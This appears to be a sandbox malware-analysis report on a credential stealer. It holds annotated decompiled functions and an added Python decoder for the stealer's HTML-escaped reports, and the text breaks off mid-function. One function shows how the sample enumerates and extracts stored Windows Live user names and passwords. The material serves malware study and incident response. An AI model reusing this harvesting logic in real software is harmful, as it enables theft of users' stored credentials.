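E0040F70E is the HTML escaper the stealer uses when it formats harvested data for its report: six byte values are expanded into entities (or `<br>` for a newline) and everything else is copied through. The Python below is an added reference implementation of that exact table, not code from the sample or the report, with the inverse function an incident responder needs to turn a captured report body back into the original text, and a helper giving the worst-case output size that the original routine never checks against. The sample strings in the test are constructed.

```python
from typing import Dict

# Byte -> replacement, recovered from the branches of E0040F70E.
# Entity lengths 4/5/6 match the memcpy sizes used in the routine.
ESCAPES: Dict[int, bytes] = {
    0x3C: b"&lt;",    # '<'
    0x3E: b"&gt;",    # '>'
    0x22: b"&quot;",  # '"'
    0xB0: b"&deg;",   # degree sign (ANSI code page)
    0x26: b"&amp;",   # '&'
    0x0A: b"<br>",    # '\n'
}
UNESCAPES: Dict[bytes, bytes] = {ent: bytes([b]) for b, ent in ESCAPES.items()}


def escape_report(data: bytes) -> bytes:
    """Same transformation as E0040F70E, working on raw bytes (the sample is ANSI, not UTF-8)."""
    out = bytearray()
    for b in data:
        out += ESCAPES.get(b, bytes([b]))
    return bytes(out)


def max_escaped_len(n_input_bytes: int) -> int:
    """Largest destination the routine can write for n input bytes.
    '"' is the widest expansion (6 bytes); the routine adds no NUL terminator."""
    return 6 * n_input_bytes


def unescape_report(html: bytes) -> bytes:
    """Inverse of escape_report for data produced by the sample.
    Every '&' in the source was escaped to '&amp;', so a longest-match scan
    over the entity table recovers the original bytes without ambiguity."""
    out = bytearray()
    i = 0
    while i < len(html):
        for ent, raw in UNESCAPES.items():
            if html.startswith(ent, i):
                out += raw
                i += len(ent)
                break
        else:
            out.append(html[i])
            i += 1
    return bytes(out)


if __name__ == "__main__":
    sample = b'user "alice" <alice@example.net>\n& 20\xb0'   # constructed input
    escaped = escape_report(sample)
    print(escaped.decode("latin-1"))
    assert unescape_report(escaped) == sample
    print("max output for", len(sample), "bytes:", max_escaped_len(len(sample)))
```

Because the original takes only two pointers, a caller that sizes the destination by the input length alone overflows on quote-heavy data; `max_escaped_len` is the bound a correct caller would have to provision. The decoder is only safe for text that went through this exact escaper: a literal `<br>` in the stolen data comes out as `&lt;br&gt;`, so the only bare `<br>` in a report is a newline.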

                                                                                                                                                                   Source addresses: 0x0040f713 to 0x0040f796 (one address per decompiled line; goto lines carry no address)


Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Similarity
• API ID: memcpy
• String ID: &$°$>$<$"$
• API String ID: 3510742995-3273207271
• Opcode ID: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
• Instruction ID: b4a8218c7fa3979214449631b2efcde822773b41d0541f29ded2a506b887ed0e
• Opcode Fuzzy Hash: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
• Instruction Fuzzy Hash: FF01DFB2EC465025DA7100092C86FE70A494BFAB11FB50137F98533AC4E0AD0CCF829F
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 69%
			/* Decompiled credential-harvesting routine from the sandbox memory dump.
			 * The comments are editorial inferences: the field offsets used below match
			 * the CREDENTIALW structure (Type +4, TargetName +8, CredentialBlobSize +0x18,
			 * CredentialBlob +0x1c, UserName +0x30), so the resolved function pointers
			 * _v776 / _v788 are most likely CredEnumerateW / CredFree. */
			E0040DEC3(intOrPtr* _a4) {
				char _v260;                       /* ANSI copy of the credential blob (password) */
				char _v516;                       /* ANSI copy of the user name; _v260 follows it in the frame */
				void _v771;
				char _v772;                       /* ANSI copy of the target name */
				intOrPtr _v776;                   /* likely CredEnumerateW, resolved by E00404651 */
				intOrPtr _v780;                   /* non-zero once the import block has been resolved */
				intOrPtr _v788;                   /* likely CredFree */
				int _v796;
				char _v800;                       /* import-resolution context handed to E00404651 */
				signed int _v804;                 /* loop index */
				char _v808;                       /* PCREDENTIALW* array returned by the enumeration */
				char _v812;                       /* number of credentials returned */
				void* __edi;
				void* __esi;
				intOrPtr* _t44;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;
				intOrPtr _t97;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;    /* result +4: credentials reported to the caller */
				 *((intOrPtr*)(_t52 + 8)) = 0;    /* result +8: entries skipped because the password was empty */
				_t89 = 0;
				_t53 = E00406282();               /* OS version info; field +4 is compared against 5 */
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					/* On Vista and later the enumeration is restricted to Windows Live entries. */
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404651( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046CC( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					/* CredEnumerateW(filter, flags = 0, &count, &credentials) */
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);             /* CredFree(credentials) */
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							/* Only CRED_TYPE_GENERIC (1) entries with a TargetName and a UserName are examined. */
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									/* Compare the first 0x11 (17) bytes, i.e. strlen("windowslive:name="),
									 * against the prefix; L004120D2 is likely a case-insensitive compare. */
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L004120D2();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);   /* CredentialBlobSize in bytes */
										if(_t68 > 0) {
											/* The blob is UTF-16, so size >> 1 is the character count; the
											 * terminator is then stored at the end of the converted password. */
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											/* Empty password: count the entry as skipped. */
											_t69 = _a4;
											_t44 = (intOrPtr*)(_t69 + 8);
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											/* Hand the recovered entry to the caller through its vtable slot +4
											 * (user-name buffer; the password buffer _v260 lies right after it). */
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}

                                                                                                                                                                  0x0040dfd8
                                                                                                                                                                  0x0040dfdd
                                                                                                                                                                  0x0040dff2
                                                                                                                                                                  0x0040dffd
                                                                                                                                                                  0x0040dffd
                                                                                                                                                                  0x0040e00b
                                                                                                                                                                  0x0040e024
                                                                                                                                                                  0x0040e027
                                                                                                                                                                  0x0040e027
                                                                                                                                                                  0x0040e027
                                                                                                                                                                  0x0040e00d
                                                                                                                                                                  0x0040e00d
                                                                                                                                                                  0x0040e01c
                                                                                                                                                                  0x0040e01f
                                                                                                                                                                  0x0040e01f
                                                                                                                                                                  0x0040e00b
                                                                                                                                                                  0x0040dfb0
                                                                                                                                                                  0x0040df94
                                                                                                                                                                  0x0040e02e
                                                                                                                                                                  0x0040e033
                                                                                                                                                                  0x0040e033
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040df47
                                                                                                                                                                  0x0040df3c

APIs
• Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
• memset.MSVCRT ref: 0040DF75
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040DF8C
• _strnicmp.MSVCRT ref: 0040DFA6
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFD2
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ByteCharMultiWide$Version_strnicmpmemset
• String ID: WindowsLive:name=*$windowslive:name=
• API String ID: 945165440-3589380929
• Opcode ID: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
• Instruction ID: faca0abe0adb4f8b424a3cc142a11908341e250f8e36283e96c9ece6c5c035f0
• Opcode Fuzzy Hash: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
• Instruction Fuzzy Hash: 14419FB1508345AFC320DF15D8848ABBBECEB84344F00493EF999A2291D734ED48CB66
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
E00408155(void* __ecx, void* __eflags, struct HWND__* _a4) {
	void _v259;
	char _v260;
	void _v4359;
	char _v4360;
	int _t17;
	CHAR* _t26;

	E00412360(0x1104, __ecx);
	_v4360 = 0;
	memset( &_v4359, 0, 0x1000);
	_t17 = GetDlgCtrlID(_a4);
	_t35 = _t17;
	GetWindowTextA(_a4,  &_v4360, 0x1000);
	if(_t17 > 0 && _v4360 != 0) {
		_v260 = 0;
		memset( &_v259, 0, 0xff);
		GetClassNameA(_a4,  &_v260, 0xff);
		_t26 =  &_v260;
		_push("sysdatetimepick32");
		_push(_t26);
		L00412072();
		if(_t26 != 0) {
			E0040802D(_t35,  &_v4360);
		}
	}
	return 1;
}

APIs
• memset.MSVCRT ref: 0040817B
• GetDlgCtrlID.USER32(?), ref: 00408186
• GetWindowTextA.USER32 ref: 00408199
• memset.MSVCRT ref: 004081BF
• GetClassNameA.USER32(?,?,000000FF), ref: 004081D2
• _stricmp.MSVCRT(?,sysdatetimepick32), ref: 004081E4
• Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
• String ID: sysdatetimepick32
• API String ID: 896699463-4169760276
• Opcode ID: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
• Instruction ID: 8ec491919e3a594e32bcc0b3aeb202d37a515ee6f0006301200e52d8450d0196
• Opcode Fuzzy Hash: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
• Instruction Fuzzy Hash: 2311EC7280511C7EE7119B54DD41EEB7BACEF19355F0400BBFA44E2152EA789FC48B68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%
E0040571F(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
	signed int _v8;
	intOrPtr _v16;
	void* __esi;
	void* _t74;
	void* _t75;
	signed int _t76;
	signed int _t89;
	signed int _t90;
	void* _t98;
	void* _t101;
	short* _t118;
	unsigned int _t126;
	intOrPtr _t128;
	signed int _t131;
	void* _t144;
	intOrPtr* _t146;
	short _t153;
	signed int _t155;

	_t129 = __ecx;
	_push(__ecx);
	_t74 = _a4 - 0x4e;
	_t155 = __ecx;
	if(_t74 == 0) {
		_t146 = _a12;
		__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
		if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
			__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
			if(__eflags == 0) {
				E00404D4C(__eflags,  *_t146,  *(_t146 + 0xc));
			}
		}
		__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
		if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
			L27:
			_t75 = 0;
			__eflags = 0;
			goto L28;
		} else {
			__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
			if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
				goto L27;
			}
			_t76 =  *(_t146 + 0x14);
			__eflags = _t76 & 0x00000002;
			if((_t76 & 0x00000002) == 0) {
				L36:
				_t131 =  *(_t146 + 0x18) ^ _t76;
				__eflags = 0x0000f000 & _t131;
                                                                                                                                                                  							if((0x0000f000 & _t131) == 0) {
                                                                                                                                                                  								L39:
                                                                                                                                                                  								__eflags =  *(_t146 + 0x14) & 0x00000002;
                                                                                                                                                                  								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
                                                                                                                                                                  									goto L27;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                                                                                                                                  								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
                                                                                                                                                                  									goto L27;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags =  *(_t146 + 0xc);
                                                                                                                                                                  								E00401413(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
                                                                                                                                                                  								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
                                                                                                                                                                  								E00401413(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
                                                                                                                                                                  								 *((intOrPtr*)(_t155 + 0x14)) = 1;
                                                                                                                                                                  								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
                                                                                                                                                                  								 *((intOrPtr*)(_t155 + 0x14)) = 0;
                                                                                                                                                                  								_t75 = 1;
                                                                                                                                                                  								L28:
                                                                                                                                                                  								return _t75;
                                                                                                                                                                  							}
                                                                                                                                                                  							L37:
                                                                                                                                                                  							_t89 = E004048E6( *_t146,  *(_t146 + 0xc), 0xf002);
                                                                                                                                                                  							__eflags = _t89 & 0x00000002;
                                                                                                                                                                  							if((_t89 & 0x00000002) != 0) {
                                                                                                                                                                  								_t90 = _t89 & 0x0000f000;
                                                                                                                                                                  								__eflags = _t90 - 0x1000;
                                                                                                                                                                  								_v8 = _t90;
                                                                                                                                                                  								E00401413(_t155, 0x3ee, 0 | _t90 == 0x00001000);
                                                                                                                                                                  								_v16 - 0x2000 = _v16 == 0x2000;
                                                                                                                                                                  								E00401413(_t155, 0x3ef, 0 | _v16 == 0x00002000);
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L39;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                                                                                                                                  						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
                                                                                                                                                                  							goto L37;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L36;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_t98 = _t74 - 0xc2;
                                                                                                                                                                  				if(_t98 == 0) {
                                                                                                                                                                  					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
                                                                                                                                                                  					E004055A9(_t155);
                                                                                                                                                                  					goto L27;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t101 = _t98 - 1;
                                                                                                                                                                  				if(_t101 != 0) {
                                                                                                                                                                  					goto L27;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t126 = _a8 >> 0x10;
                                                                                                                                                                  				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
                                                                                                                                                                  					L7:
                                                                                                                                                                  					if(_t126 != 0) {
                                                                                                                                                                  						goto L27;
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_a8 != 0x3f0) {
                                                                                                                                                                  						L13:
                                                                                                                                                                  						if(_a8 == 0x3eb) {
                                                                                                                                                                  							E00404B3F(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_a8 == 0x3ec) {
                                                                                                                                                                  							E00404B82(GetDlgItem( *(_t155 + 4), 0x3e9));
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_a8 == 0x3ee) {
                                                                                                                                                                  							E00404BBE(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_a8 == 0x3ef) {
                                                                                                                                                                  							E00404BBE(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_a8 == 2) {
                                                                                                                                                                  							EndDialog( *(_t155 + 4), 2);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_a8 == 1) {
                                                                                                                                                                  							E00405542(_t155);
                                                                                                                                                                  							EndDialog( *(_t155 + 4), 1);
                                                                                                                                                                  						}
                                                                                                                                                                  						_t75 = 1;
                                                                                                                                                                  						goto L28;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
                                                                                                                                                                  					_t129 = 0;
                                                                                                                                                                  					if(_t128 <= 0) {
                                                                                                                                                                  						L12:
                                                                                                                                                                  						E004055A9(_t155);
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t144 = 0;
                                                                                                                                                                  					do {
                                                                                                                                                                  						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
                                                                                                                                                                  						 *(_t118 + 2) = _t129;
                                                                                                                                                                  						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
                                                                                                                                                                  						_t129 = _t129 + 1;
                                                                                                                                                                  						_t144 = _t144 + 0x14;
                                                                                                                                                                  						 *_t118 = _t153;
                                                                                                                                                                  					} while (_t129 < _t128);
                                                                                                                                                                  					goto L12;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if(_a8 != 0x3ed) {
                                                                                                                                                                  						goto L27;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						E004054D0(__ecx, __ecx);
                                                                                                                                                                  						goto L7;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  			}
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040589f
                                                                                                                                                                  0x00405888
                                                                                                                                                                  0x00405737
                                                                                                                                                                  0x0040573c
                                                                                                                                                                  0x0040584e
                                                                                                                                                                  0x00405855
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405855
                                                                                                                                                                  0x00405742
                                                                                                                                                                  0x00405743
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040574c
                                                                                                                                                                  0x00405752
                                                                                                                                                                  0x0040576c
                                                                                                                                                                  0x0040576f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040577b
                                                                                                                                                                  0x004057b0
                                                                                                                                                                  0x004057c1
                                                                                                                                                                  0x004057c9
                                                                                                                                                                  0x004057c9
                                                                                                                                                                  0x004057d4
                                                                                                                                                                  0x004057dc
                                                                                                                                                                  0x004057dc
                                                                                                                                                                  0x004057e7
                                                                                                                                                                  0x004057f2
                                                                                                                                                                  0x004057f8
                                                                                                                                                                  0x004057ff
                                                                                                                                                                  0x0040580a
                                                                                                                                                                  0x00405810
                                                                                                                                                                  0x0040581c
                                                                                                                                                                  0x00405823
                                                                                                                                                                  0x00405823
                                                                                                                                                                  0x0040582a
                                                                                                                                                                  0x0040582c
                                                                                                                                                                  0x00405836
                                                                                                                                                                  0x00405836
                                                                                                                                                                  0x0040583a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040583a
                                                                                                                                                                  0x00405780
                                                                                                                                                                  0x00405783
                                                                                                                                                                  0x00405787
                                                                                                                                                                  0x004057aa
                                                                                                                                                                  0x004057ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004057ab
                                                                                                                                                                  0x00405789
                                                                                                                                                                  0x0040578b
                                                                                                                                                                  0x00405790
                                                                                                                                                                  0x00405793
                                                                                                                                                                  0x0040579a
                                                                                                                                                                  0x0040579f
                                                                                                                                                                  0x004057a0
                                                                                                                                                                  0x004057a5
                                                                                                                                                                  0x004057a5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040575b
                                                                                                                                                                  0x00405761
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405767
                                                                                                                                                                  0x00405767
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405767
                                                                                                                                                                  0x00405761

APIs
• GetDlgItem.USER32 ref: 004057C7
• GetDlgItem.USER32 ref: 004057DA
• GetDlgItem.USER32 ref: 004057EF
• GetDlgItem.USER32 ref: 00405807
• EndDialog.USER32(?,00000002), ref: 00405823
• EndDialog.USER32(?,00000001), ref: 00405836
  • Part of subcall function 004054D0: GetDlgItem.USER32 ref: 004054DE
  • Part of subcall function 004054D0: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054F3
  • Part of subcall function 004054D0: SendMessageA.USER32 ref: 0040550F
• SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 0040584E
• SetDlgItemInt.USER32 ref: 0040595A
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Item$DialogMessageSend
• String ID:
• API String ID: 2485852401-0
• Opcode ID: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
• Instruction ID: 327bdf07108b1d48d13abdf232bd1ccce71b7be96730af3de4981d1ea2c32abc
• Opcode Fuzzy Hash: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
• Instruction Fuzzy Hash: 6561C031600A05AFDB25BF25C886A2BB3A5FF40725F00C23EF915A72D1D778A960CF49
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%
E0040596A(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
	RECT* _v8;
	void* __esi;
	void* _t39;
	signed int _t41;
	void* _t42;
	struct HWND__* _t47;
	signed int _t53;
	void* _t54;
	signed int _t76;
	signed int _t78;
	void* _t80;
	void** _t82;
	signed int _t86;
	void* _t90;
	signed int _t91;

	_t80 = __edi;
	_push(_t58);
	_push(0xc);
	_v8 = 0;
	*((intOrPtr*)(__edi + 0x10)) = __eax;
	L00412090();
	if(__eax == 0) {
		_t82 = 0;
	} else {
		*((intOrPtr*)(__eax)) = 0;
		_t82 = __eax;
	}
	*(_t80 + 0xc) = _t82;
	_t39 = *_t82;
	_t90 = _t39;
	if(_t90 != 0) {
		_push(_t39);
		L00412096();
		*_t82 = 0;
	}
	_t82[2] = _a8;
	_t41 = E00404A05(_a8);
	_t76 = 4;
	_t82[1] = _t41;
	_t42 = _t41 * _t76;
	_push( ~(0 | _t90 > 0x00000000) | _t42);
	L00412090();
	*_t82 = _t42;
	memset(_t42, 0, _t82[1] << 2);
	E004085AB( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
	_t91 = *(_t80 + 0x10);
	if(_t91 == 0) {
		_t86 = ( *(_t80 + 0xc))[1];
		_t78 = 0x14;
		_t53 = _t86 * _t78;
		_push( ~(0 | _t91 > 0x00000000) | _t53);
		L00412090();
		*(_t80 + 0x10) = _t53;
		if(_t86 > 0) {
			_t54 = 0;
			do {
				*((intOrPtr*)(_t54 + *(_t80 + 0x10) + 0xc)) = 0x78;
				_t54 = _t54 + 0x14;
				_t86 = _t86 - 1;
			} while (_t86 != 0);
		}
		_v8 = 1;
	}
	if(E004014EA(0x448, _t80, _a4) == 1) {
		E0040851B( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
		InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
	}
	_t47 = SetFocus(_a8);
	if(_v8 != 0) {
		_push( *(_t80 + 0x10));
		L00412096();
	}
	return _t47;
}
Disassembly address range: 0x0040596a - 0x00405a6b (instruction text not captured)

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2313361498-0
                                                                                                                                                                  • Opcode ID: a580d9142bc32eaab65664efd4de07b17d343628356770d299779b1e7220968e
                                                                                                                                                                  • Instruction ID: c9d5e52e17e49b2fdf2665c470f327c4663aeb176fcf1135955ad165868745cd
                                                                                                                                                                  • Opcode Fuzzy Hash: a580d9142bc32eaab65664efd4de07b17d343628356770d299779b1e7220968e
                                                                                                                                                                  • Instruction Fuzzy Hash: 113183B2600601AFDB249F79D985A2AF7A4FB08354710863FF55AD7290DB78AC50CF58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
			// Lays out three child windows of the parent at __esi + 0x108 in one DeferWindowPos batch:
			// the child at +0x118 across the top, the child at +0x114 along the bottom, and the
			// window at (*(__esi + 0x370)) + 0x184 filling the space between them.
			E0040A7B2(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x124)) != 0) {                     // only when this flag is set
					GetClientRect( *(__esi + 0x108),  &_v32);                 // parent client area
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;                        // height of the bottom child
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;                            // client width
					_t60 = _v48.bottom - _v48.top + 1;                        // height of the top child
					_v16 = _v32.bottom - _v32.top;                            // client height
					_v8 = BeginDeferWindowPos(3);                             // one batch of three moves
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);                        // top child at (0,0), full width; 4 = SWP_NOZORDER
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);    // bottom child; 6 = SWP_NOMOVE|SWP_NOZORDER, so the x/y given here are ignored and only the size is applied
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);  // middle window fills the remaining height
					return EndDeferWindowPos(_v8);
				}
				return _t32;                                                  // _t32 is never assigned on this path: decompiler artifact, eax is returned as-is
			}

Disassembly address range: 0x0040a7bf - 0x0040a88d (instruction text not captured)

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2126104762-0
                                                                                                                                                                  • Opcode ID: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                                                                                                                                                                  • Instruction ID: 09cbeee5e8014f0efd252c30326660bc7ddd54a992e069e65e32613af5811a3b
                                                                                                                                                                  • Opcode Fuzzy Hash: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
                                                                                                                                                                  • Instruction Fuzzy Hash: AF21C871A00209FFDB11DFA8DD89FEEBBB9FB08311F104465FA55A2160CA71AA519B24
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 88%
			// Centres the window _a4 on the screen: reads the screen size (SM_CXFULLSCREEN/SM_CYFULLSCREEN,
			// falling back to the desktop DC's HORZRES/VERTRES), then MoveWindow()s it to
			// ((screen - window) / 2, clamped at 0) without changing its size.
			E0040649B(void* __edx, struct HWND__* _a4) {
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct HDC__* _t19;
				signed int _t32;
				int _t33;
				int _t35;
				int _t37;
				void* _t38;
				int _t39;
				intOrPtr _t40;
				intOrPtr _t45;

				_t38 = __edx;                                                 // edx; the two cdq instructions below overwrite it, which the decompiler does not model
				_t35 = GetSystemMetrics(0x11);                                // 0x11 = SM_CYFULLSCREEN (screen height)
